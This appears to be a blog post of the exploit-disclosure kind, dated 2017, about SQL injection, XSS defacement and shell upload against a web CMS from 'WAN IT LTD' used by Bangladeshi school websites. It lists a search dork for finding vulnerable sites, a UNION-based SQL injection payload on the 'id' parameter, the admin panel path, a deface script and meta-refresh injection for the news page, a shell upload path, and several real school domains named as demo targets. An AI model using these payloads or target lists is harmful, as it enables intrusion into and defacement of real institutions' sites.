Header Ads

WAN IT LTD - SQLInjection / XSS / JSDeface

#Title: WAN IT LTD SQl/XSS Deface
#Dork: intext:"WAN IT LTD" inurl:"id=" +"site:edu.bd"
#Date: 26.10.2017
#Test: W10
#CWEs: CWE-89
#Exploit Discovered By: Informacion - Anonymous
#Author: mr.Gh0st N@0b
 #======================#
#P00f:
#http://site.com/about_us.php?menu=aboutus&id=-about-0000001 {Inject} |---
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: menu=aboutus&id=-8681' UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x67 495a756b546c697068424a6759715a545a4a4255787748667350656953787a65746450734b4e6f,0x7 16a7a7171)-- Satn
Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT] ---|
#Admin Panel
#http://site.com/admin/ {login Here}
#Dem0s:
 #http://sonarhatsnc.edu.bd/about_us.php…
#http://rwahs.edu.bd/
#http://rwahs.edu.bd/
#http://www.gozkhalimlths.edu.bd/
#http://coghighschool.edu.bd/
#XSS Alert #/admin/add_news.php?menu=news {Exploit XSS Script}
#Example
#<script src="http://yourdeface.js"></script>
#<META http-equiv="refresh" content="1;URL=yourdefacepage">
#Upload Shell
#/admin/add_gallery.php?menu=gallery {Upload Here} #===========================================#

1 comment:

Silahkan Komentar dengan bahasa yang sopan

Powered by Blogger.